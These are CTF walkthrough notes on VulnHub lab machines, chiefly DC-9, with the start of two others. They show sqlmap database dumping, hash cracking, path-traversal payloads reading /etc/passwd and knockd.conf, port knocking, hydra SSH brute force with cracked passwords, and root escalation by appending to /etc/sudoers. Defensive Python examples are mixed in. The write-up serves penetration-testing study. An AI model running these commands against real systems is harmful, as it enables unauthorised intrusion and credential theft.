fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
```

Inspect the Staff database

Same approach for the data in the Staff database

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -l a.txt -D Staff --tables --batch
[18:30:11] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -l a.txt -D Staff -T Users --columns --batch
[18:31:46] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+

┌──(root㉿kali)-[~/localkali/testpayload]
└─# sqlmap -l a.txt --batch -D Staff -T Users -C "Username,Password" --dump
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
```

The password looks like an MD5 hash; looking it up on somd5.com gives transorbital1.

3. Login

After logging in there are only a few extra buttons (adding records); nothing of use.

/etc/passwd

Find the real path behind the file parameter; what follows is only a demonstration.

Add the payload by hand, e.g. ../../../etc/passwd

At ../../../../etc/passwd the response length starts to change, which reveals the real path.

Adding a few extra parent-directory segments to the URL also works.
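
What the file parameter is doing, and how it should have been handled, as an added example that is not the box's PHP: the vulnerable function joins the request value onto the document root, so ../ segments walk out of it exactly as the length change above shows; the hardened one resolves the path first and refuses anything that does not stay under the root. The directory layout is constructed in a temporary folder.

```python
import os
import tempfile


def read_vulnerable(docroot, requested):
    """Joins the request value onto the document root, which is evidently what
    addrecord.php?file= does: '../' segments simply walk out of the root."""
    with open(os.path.join(docroot, requested)) as fh:
        return fh.read()


def read_hardened(docroot, requested):
    """Resolve '..' and symlinks first, then refuse anything that is not under the root.
    An absolute value is covered too: os.path.join discards the root for it, and the
    containment check then rejects the result."""
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"refusing to read outside {root}: {requested!r}")
    with open(target) as fh:
        return fh.read()


def demo():
    """Constructed layout: a document root three levels below a fake /etc."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "var", "www", "html")
        os.makedirs(docroot)
        os.makedirs(os.path.join(tmp, "etc"))
        with open(os.path.join(docroot, "record.txt"), "w") as fh:
            fh.write("public record\n")
        with open(os.path.join(tmp, "etc", "secret.conf"), "w") as fh:
            fh.write("secret\n")
        traversal = "../../../etc/secret.conf"
        results = {
            "vulnerable/normal": read_vulnerable(docroot, "record.txt"),
            "vulnerable/traversal": read_vulnerable(docroot, traversal),
            "hardened/normal": read_hardened(docroot, "record.txt"),
        }
        try:
            read_hardened(docroot, traversal)
            results["hardened/traversal"] = "read"
        except PermissionError:
            results["hardened/traversal"] = "refused"
        return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:22} -> {outcome!r}")
```

Checking containment on the resolved path, rather than rejecting the substring "..", is what makes the hardened version hold up against encoded or symlinked variants of the same request.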

/etc/ssh/sshd_config

Read /etc/ssh/sshd_config, search the page for "root" and note the useful detail: root is not allowed to log in remotely over SSH.

/proc/sched_debug

Copy the data from the page, then on Kali run vi b.txt and paste it in.

```
http://192.168.3.45/addrecord.php?file=../../../../proc/sched_debug
```


After processing the data, the knockd service shows up.

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# cat b.txt|egrep '[a-zA-Z]+' -o|sort|uniq
...
kdevtmpfs
key
khugepaged
khungtaskd
kintegrityd
knockd # note this service
ksmd
ksoftirqd
kstrp
kswapd
kthreadd
kthrotld
ktime
kworker
latency
...
```

[!NOTE] Command explanation
awk -F, '{print $2}' extracts the second column. awk is a powerful text-processing tool; -F, sets the comma as the field separator (the standard CSV delimiter); {print $2} prints the second field of every line.

/etc/knockd.conf

A port-knocking service: SYN packets must be sent to three ports in order before SSH is opened.

```
http://192.168.3.45/addrecord.php?file=../../../../etc/knockd.conf

[options]
UseSyslog
[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
```

nmap first shows port 22 as filtered; after running the three nc commands in order, port 22 is open.

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# nmap -p 22 192.168.3.45
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 19:09 CST
Nmap scan report for 192.168.3.45
Host is up (0.00048s latency).

PORT STATE SERVICE
22/tcp filtered ssh
MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

┌──(root㉿kali)-[~/localkali/testpayload]
└─# 7469,8475,9842
7469,8475,9842:未找到命令

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nc 192.168.3.45 7469
(UNKNOWN) [192.168.3.45] 7469 (?) : Connection refused

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nc 192.168.3.45 8475
(UNKNOWN) [192.168.3.45] 8475 (?) : Connection refused

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nc 192.168.3.45 9842
(UNKNOWN) [192.168.3.45] 9842 (?) : Connection refused

┌──(root㉿kali)-[~/localkali/testpayload]
└─# nmap -p 22 192.168.3.45
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 19:10 CST
Nmap scan report for 192.168.3.45
Host is up (0.00057s latency).

PORT STATE SERVICE
22/tcp open ssh
MAC Address: 08:00:27:95:4E:A9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
```

Alternatively, use the knock command directly; if it is not installed, run apt install knockd -y

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# knock 192.168.3.45 7469 8475 9842
```
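
nc reports "Connection refused" for each knock and yet the door opens: knockd watches for SYN packets with a packet capture rather than listening on those ports, so a refused TCP connect still counts as a knock. The block below is an added model of how knockd evaluates the configuration recovered above (my simplified rendering of its matching rules, not knockd's own code): it parses the [openSSH] and [closeSSH] sections, tracks each source address's progress through a sequence, resets on a wrong port or when seq_timeout elapses, and returns the command (with %IP% substituted) that would fire; it never executes anything.

```python
import re

# The knockd.conf recovered from the box, transcribed so the block runs stand-alone.
KNOCKD_CONF = """\
[options]
UseSyslog
[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
"""


def parse_knockd_conf(text):
    """Return {door_name: {"sequence": [ports], "timeout": seconds, "command": str}}
    for every section that defines a sequence; [options] is skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.match(r"\[(.+)\]$", line)
        if header:
            current = sections.setdefault(header.group(1), {})
            continue
        if "=" in line and current is not None:
            key, value = (part.strip() for part in line.split("=", 1))
            current[key] = value
    doors = {}
    for name, opts in sections.items():
        if name == "options" or "sequence" not in opts:
            continue
        doors[name] = {
            "sequence": [int(p) for p in opts["sequence"].split(",")],
            "timeout": int(opts.get("seq_timeout", 5)),
            "command": opts["command"],
        }
    return doors


class KnockTracker:
    """Per-source progress through each door's sequence. A knock on the wrong port,
    or a gap longer than seq_timeout, throws the progress away; completing the
    sequence yields the door's command and starts over."""

    def __init__(self, doors):
        self.doors = doors
        self.state = {}  # (ip, door) -> (next_index, time_of_last_knock)

    def knock(self, ip, port, now):
        fired = []
        for name, door in self.doors.items():
            idx, last = self.state.get((ip, name), (0, now))
            if idx and now - last > door["timeout"]:
                idx = 0  # too slow: the partial sequence expires
            idx = idx + 1 if port == door["sequence"][idx] else 0
            if idx == len(door["sequence"]):
                fired.append(door["command"].replace("%IP%", ip))
                idx = 0
            self.state[(ip, name)] = (idx, now)
        return fired


def run_scenario(doors, knocks):
    """Feed (ip, port, seconds) tuples through a fresh tracker; return every command fired."""
    tracker = KnockTracker(doors)
    fired = []
    for ip, port, t in knocks:
        fired.extend(tracker.knock(ip, port, t))
    return fired


if __name__ == "__main__":
    doors = parse_knockd_conf(KNOCKD_CONF)
    knocks = [("192.168.3.43", 7469, 0), ("192.168.3.43", 8475, 1), ("192.168.3.43", 9842, 2)]
    print(run_scenario(doors, knocks))
```

Two things the model makes visible: the sequence is bound to the source address (%IP%), so the rule opens port 22 only for the knocking host, and the reverse sequence closes it again; and because the knock is observed passively, anything that can see the three SYNs on the wire can replay them, which is why port knocking hides a service but does not authenticate to it.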

4. hydra

Brute-force the SSH username and password with hydra

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# hydra -L user.txt -P pass.txt ssh://192.168.3.45 -t 4

[STATUS] 80.00 tries/min, 80 tries in 00:01h, 281 to do in 00:04h, 4 active
[22][ssh] host: 192.168.3.45 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.3.45 login: joeyt password: Passw0rd
[STATUS] 91.33 tries/min, 274 tries in 00:03h, 87 to do in 00:01h, 4 active
[22][ssh] host: 192.168.3.45 login: janitor password: Ilovepeepee
[STATUS] 89.50 tries/min, 358 tries in 00:04h, 3 to do in 00:01h, 4 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-10 19:25:08
```

[!NOTE] -L user.txt

  • -L: uppercase L, for a list of usernames: a plain-text dictionary file with one username per line
  • user.txt: the username dictionary in the current working directory (if the file is elsewhere, give its absolute path, e.g. `/t
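
What this run looks like from the target's side, as an added detection example that is not part of the page: hydra's 358 attempts leave a burst of sshd "Failed password" entries from one source in /var/log/auth.log, followed by an "Accepted password" for the same source. The log lines below are constructed to resemble that pattern (not captured from the box); the detector counts failures per source inside a sliding window and separately flags a success from a source already flagged, which is the event worth responding to.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt resembling what a hydra run leaves behind (not captured from DC-9).
SAMPLE_AUTH_LOG = """\
Jan 10 19:20:01 dc-9 sshd[1201]: Failed password for invalid user marym from 192.168.3.43 port 50122 ssh2
Jan 10 19:20:02 dc-9 sshd[1203]: Failed password for invalid user julied from 192.168.3.43 port 50124 ssh2
Jan 10 19:20:03 dc-9 sshd[1205]: Failed password for fredf from 192.168.3.43 port 50126 ssh2
Jan 10 19:20:04 dc-9 sshd[1207]: Failed password for invalid user barneyr from 192.168.3.43 port 50128 ssh2
Jan 10 19:20:05 dc-9 sshd[1209]: Failed password for invalid user tomc from 192.168.3.43 port 50130 ssh2
Jan 10 19:20:06 dc-9 sshd[1211]: Failed password for joeyt from 192.168.3.43 port 50132 ssh2
Jan 10 19:20:40 dc-9 sshd[1260]: Accepted password for chandlerb from 192.168.3.43 port 50210 ssh2
Jan 10 19:25:00 dc-9 sshd[1300]: Accepted publickey for fredf from 192.168.3.5 port 40000 ssh2
Jan 10 19:26:00 dc-9 sshd[1310]: Failed password for fredf from 192.168.3.5 port 40010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse(lines, year=2026):
    """Turn syslog-style sshd lines into (timestamp, result, user, ip) tuples.
    Syslog omits the year, so the caller supplies it."""
    events = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect(events, window_seconds=60, threshold=5):
    """Alert once per source when `threshold` failures land inside `window_seconds`,
    and again when that source later authenticates successfully: a success after a
    burst of failures is the credential-guessing outcome that matters."""
    alerts = []
    recent_failures = defaultdict(list)
    flagged = set()
    for ts, result, user, ip in events:
        if result == "Failed":
            window = [t for t in recent_failures[ip] if (ts - t).total_seconds() <= window_seconds]
            window.append(ts)
            recent_failures[ip] = window
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("brute-force", ip, len(window), ts))
        elif ip in flagged:
            alerts.append(("success-after-brute-force", ip, user, ts))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_AUTH_LOG.splitlines())):
        print(alert)
```

The single failure from 192.168.3.5 never reaches the threshold and raises nothing, which is the point of the window: lockout logic keyed on total failures would punish an admin's typo while this keys on rate and on the follow-on success.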

User chandlerb

Nothing useful

```
chandlerb@dc-9:~$ ls -al
total 12
drwx------ 3 chandlerb chandlerb 4096 Jan 10 21:23 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 chandlerb chandlerb 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 chandlerb chandlerb 4096 Jan 10 21:23 .gnupg
chandlerb@dc-9:~$ history
1 ls -al
2 history
chandlerb@dc-9:~$ cd .gnupg/
chandlerb@dc-9:~/.gnupg$ ls -l
total 4
drwx------ 2 chandlerb chandlerb 4096 Jan 10 21:23 private-keys-v1.d
chandlerb@dc-9:~/.gnupg$ cd private-keys-v1.d/
chandlerb@dc-9:~/.gnupg/private-keys-v1.d$ ls -l
total 0
chandlerb@dc-9:~/.gnupg/private-keys-v1.d$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for chandlerb:
Sorry, user chandlerb may not run sudo on dc-9.
```

User joeyt

Likewise, nothing useful

```
joeyt@dc-9:~$ ls -la
total 12
drwx------ 3 joeyt joeyt 4096 Jan 10 21:23 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 joeyt joeyt 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 joeyt joeyt 4096 Jan 10 21:23 .gnupg
joeyt@dc-9:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
```

User janitor

Several passwords are found; add them to the pass.txt from before.

```
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Jan 10 21:24 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Jan 10 21:24 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cat .secrets-for-putin/
cat: .secrets-for-putin/: Is a directory
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls -la
total 12
drwx------ 2 janitor janitor 4096 Dec 29 2019 .
drwx------ 4 janitor janitor 4096 Jan 10 21:24 ..
-rwx------ 1 janitor janitor 66 Dec 29 2019 passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
```

Brute-force again

```
┌──(root㉿kali)-[~/localkali/testpayload]
└─# hydra -L user.txt -P pass.txt ssh://192.168.3.45 -t 64
[22][ssh] host: 192.168.3.45 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.3.45 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.3.45 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.3.45 login: janitor password: Ilovepeepee
```

One more user turns up: fredf

User fredf

```
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
```

Check the local /etc/sudoers

Reading /opt/devstuff/dist/test/test directly gives binary garbage; going up the directory tree shows it was built from a Python file, so read the source, test.py.

```
fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$ ls -l
total 20
drwxr-xr-x 3 root root 4096 Dec 29 2019 build
drwxr-xr-x 3 root root 4096 Dec 29 2019 dist
drwxr-xr-x 2 root root 4096 Dec 29 2019 __pycache__
-rw-r--r-- 1 root root 250 Dec 29 2019 test.py
-rw-r--r-- 1 root root 959 Dec 29 2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
```

[!Info] test.py
This Python script is a small file-handling tool: it reads the contents of one file and appends them to the end of another.
In short, it does the following:

  1. Argument check: it first checks how many arguments were passed. Besides its own name (sys.argv[0]) it expects two: a file to read and a file to append to. If the count is wrong, it prints the usage and exits.
  2. Read: it opens the file named by the first argument (sys.argv[1]) and reads all of it.
  3. Append: it then opens the file named by the second argument (sys.argv[2]) and appends what it read to the end of that file.
    A simple usage example:
```
# Suppose the current directory has file1.txt (containing "Hello") and file2.txt (containing "World")
python test.py file1.txt file2.txt
# Afterwards file2.txt contains "WorldHello"
```

5. Privilege escalation

Look at the local /etc/sudoers and copy the line %sudo ALL=(ALL:ALL) ALL into a.txt as fredf.

[!Warning] /etc/sudoers
/etc/sudoers is the central privilege-control file on Linux/Unix systems. It defines which users and groups may temporarily obtain root (or another user's) privileges, and how: whether a password is required and which commands may be run. Its design goal is fine-grained delegation of privileges without compromising the system's security.

https://www.doubao.com/thread/w91afa01ef034300b introduces /etc/sudoers
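
A check a defender would run on this file, as an added example that is not from the page: parse the user specifications in /etc/sudoers and flag the patterns that make this box fall, a NOPASSWD rule and a rule whose command is a custom root-run binary that copies file contents. The sudoers text is constructed for the demonstration; the fredf rule mirrors the one printed by sudo -l above.

```python
import re

# Constructed /etc/sudoers excerpt for the demo (not the file from the box).
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
fredf   ALL=(root) NOPASSWD: /opt/devstuff/dist/test/test
backup  ALL=(root) /usr/bin/rsync
"""

# user  host=(runas) [TAG:] command, command ...
RULE_RE = re.compile(r"^(?P<who>[%\w.-]+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAGS = ("NOPASSWD:", "PASSWD:", "NOEXEC:", "SETENV:")
STANDARD_DIRS = ("/usr/bin/", "/bin/", "/usr/sbin/", "/sbin/", "/usr/local/bin/", "/usr/local/sbin/")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """One dict per (who, command) pair. Tags such as NOPASSWD: stick to the commands that
    follow them in the same specification until PASSWD: switches them off again."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m["runas"] or "root"  # no (runas) list means root
        nopasswd = False
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            changed = True
            while changed:  # strip any leading tags, remembering the password tags
                changed = False
                for tag in TAGS:
                    if cmd.startswith(tag):
                        if tag == "NOPASSWD:":
                            nopasswd = True
                        elif tag == "PASSWD:":
                            nopasswd = False
                        cmd = cmd[len(tag):].strip()
                        changed = True
            rules.append({"who": m["who"], "hosts": m["hosts"], "runas": runas,
                          "nopasswd": nopasswd, "cmd": cmd})
    return rules


def audit(rules):
    """Findings as (who, command, reason). root's own rule is skipped: it adds nothing."""
    findings = []
    for r in rules:
        if r["who"] == "root":
            continue
        runs_as_root = r["runas"].split(":")[0] in ("root", "ALL")
        if r["cmd"] == "ALL":
            reason = "may run any command" + (" without a password" if r["nopasswd"] else "")
            findings.append((r["who"], "ALL", reason))
            continue
        if r["nopasswd"]:
            findings.append((r["who"], r["cmd"], "no password required"))
        if runs_as_root and not r["cmd"].startswith(STANDARD_DIRS):
            findings.append((r["who"], r["cmd"], "non-standard binary runs as root; review what it reads and writes"))
    return findings


if __name__ == "__main__":
    for who, cmd, reason in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{who:8} {cmd:32} {reason}")
```

The second finding for fredf is the one that matters here: a root-run program that takes an arbitrary destination file is equivalent to root write access, and /etc/sudoers is only the most direct file to aim it at.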

```
fredf@dc-9:/opt/devstuff$ cd /tmp
fredf@dc-9:/tmp$ nano a.txt
fredf@dc-9:/tmp$ cat a.txt
fredf ALL=(ALL:ALL) ALL
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test a.txt /etc/sudoers
fredf@dc-9:/tmp$ sudo su -
[sudo] password for fredf:
root@dc-9:~# id
uid=0(root) gid=0(root) groups=0(root)

root@dc-9:~# cat theflag.txt


███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding. :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.
```

[^1]: https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/

[!tip]- tips
Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.

Game of Thrones

1. arp

2. nmap

Use the first form: because it scans all 65535 ports (-p-) it finds port 1337, which the second command, limited to nmap's default top-1000 ports, misses.

```bash
nmap -A -T4 -p- 192.168.43.13 # all ports + version + OS + default NSE scripts
```

```bash
nmap -T4 -sS -sV -sC -O 192.168.3.17
```

[!summary]- Ports

| port  | service           |
|-------|-------------------|
| 21    | ftp               |
| 22    | ssh               |
| 53    | domain            |
| 80    | Apache httpd      |
| 143   | imap              |
| 3306  | mysql             |
| 5432  | postgresql        |
| 10000 | MiniServ (Webmin) |

-sV service and version detection
-A aggressive scan: OS detection, version detection, default scripts and traceroute
-oG greppable output written to a file
-T4 aggressive timing template (fast)

[[扫描结果]]

```text
┌──(root㉿kali-linux)-[~/…/work/exam/ctf/game-of-thrones]
└─# nmap -sV -p80,21-22,53,5432,1337,10000 -T4 -A -oG namp1_game.txt 192.168.3.17
Starting Nmap 7.93 ( https://nmap.org ) at 2025-12-23 21:11 CST
Nmap scan report for 192.168.3.17
Host is up (0.0020s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh Linksys WRT45G modified dropbear sshd (protocol 2.0)
| ssh-hostkey:
| 2048 e65bd7786b864f9b35409fc71fdd0d9f (RSA)
| 256 b8e330882eba56f249b0cc35c7cc4806 (ECDSA)
|_ 256 a9f2d8eef09349d81904ffad89eedf7d (ED25519)
53/tcp open domain (unknown banner: Bind)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
| dns-nsid:
|_ bind.version: Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
| http-robots.txt: 2 disallowed entries
|_/secret-island/ /direct-access-to-kings-landing/
|_http-title: Game of Thrones CTF
1337/tcp open http nginx
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Welcome to Casterly Rock
|_http-title: 401 Authorization Required
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
10000/tcp open http MiniServ 1.590 (Webmin httpd)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Login to Stormlands
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.93%I=7%D=12/23%Time=694A9517%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\
SF:x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c
SF:\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 08:00:27:44:26:17 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Device: router

TRACEROUTE
HOP RTT ADDRESS
1 1.98 ms 192.168.3.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.65 seconds
```

1. Information gathering

```text
~  nmap -sVC -p- 192.168.3.51
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-24 19:45 CST
Nmap scan report for 192.168.3.51
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.3.48
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r-- 1 0 0 20 Jan 22 12:27 readme.txt
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:43:B0:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The FTP server allows anonymous login (ftp-anon above), so connect with lftp as user ftp and read readme.txt:

```text
☁  ~  lftp 192.168.3.51
lftp 192.168.3.51:~> user ftp
Password:
lftp ftp@192.168.3.51:~> user ftp
Password:
lftp ftp@192.168.3.51:~> ls -la
dr-xr-xr-x 2 0 0 4096 Jan 22 12:27 .
dr-xr-xr-x 2 0 0 4096 Jan 22 12:27 ..
-r--r--r-- 1 0 0 20 Jan 22 12:27 readme.txt
lftp ftp@192.168.3.51:/> cat readme.txt
http://tmpfile.dsz/
20 bytes transferred
```

The file points at a hostname, so add `192.168.3.51 tmpfile.dsz` to /etc/hosts and run dirsearch against it:

```text
☁  ~  dirsearch -u http://tmpfile.dsz/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_tmpfile.dsz/__26-01-24_20-06-21.txt

Target: http://tmpfile.dsz/

[20:06:21] Starting:
[20:06:24] 403 - 276B - /.ht_wsr.txt
[20:06:24] 403 - 276B - /.htaccess.bak1
[20:06:24] 403 - 276B - /.htaccess.orig
[20:06:24] 403 - 276B - /.htaccess.sample
[20:06:24] 403 - 276B - /.htaccess.save
[20:06:24] 403 - 276B - /.htaccess_orig
[20:06:24] 403 - 276B - /.htaccess_extra
[20:06:24] 403 - 276B - /.htaccessBAK
[20:06:24] 403 - 276B - /.htaccess_sc
[20:06:24] 403 - 276B - /.htaccessOLD
[20:06:24] 403 - 276B - /.htaccessOLD2
[20:06:24] 403 - 276B - /.htm
[20:06:24] 403 - 276B - /.html
[20:06:24] 403 - 276B - /.htpasswd_test
[20:06:24] 403 - 276B - /.htpasswds
[20:06:24] 403 - 276B - /.httr-oauth
[20:06:26] 403 - 276B - /.php
[20:07:04] 403 - 276B - /server-status
[20:07:04] 403 - 276B - /server-status/
[20:07:13] 301 - 312B - /uploads -> http://tmpfile.dsz/uploads/
